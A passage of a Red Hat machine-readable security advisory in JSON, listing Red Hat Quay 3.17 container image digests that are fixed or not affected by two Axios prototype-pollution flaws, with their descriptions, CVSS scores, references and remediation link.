            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2461607"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Axios, an HTTP client library. This vulnerability allows an attacker to exploit a prototype pollution issue if another part of the application has already polluted the Object.prototype. By doing so, the attacker can intercept and modify JSON responses or take control of the HTTP communication. This could lead to unauthorized access to sensitive information like user credentials and request details.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "axios: Axios: HTTP Transport Hijacking via Prototype Pollution",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-42033"
        },
        {
          "category": "external",
          "summary": "RHBZ#2461607",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2461607"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-42033",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-42033"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42033",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42033"
        },
        {
          "category": "external",
          "summary": "https://github.com/axios/axios/security/advisories/GHSA-pf86-5x62-jrwf",
          "url": "https://github.com/axios/axios/security/advisories/GHSA-pf86-5x62-jrwf"
        }
      ],
      "release_date": "2026-04-24T17:36:44.132000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-06-02T13:10:36+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:22465"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.4,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "axios: Axios: HTTP Transport Hijacking via Prototype Pollution"
    },
    {
      "cve": "CVE-2026-42035",
      "cwe": {
        "id": "CWE-915",
        "name": "Improperly Controlled Modification of Dynamically-Determined Object Attributes"
      },
      "discovery_date": "2026-04-24T18:01:17.109481+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2461606"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Axios, a software library for making network requests. A remote attacker can exploit a prototype pollution vulnerability to inject arbitrary HTTP headers into outgoing requests. This occurs when the application\u0027s core object definitions are manipulated, causing Axios to misinterpret data and include attacker-controlled headers in network communications. This could lead to unauthorized actions or data manipulation.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "axios: Axios: Arbitrary HTTP header injection via prototype pollution",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
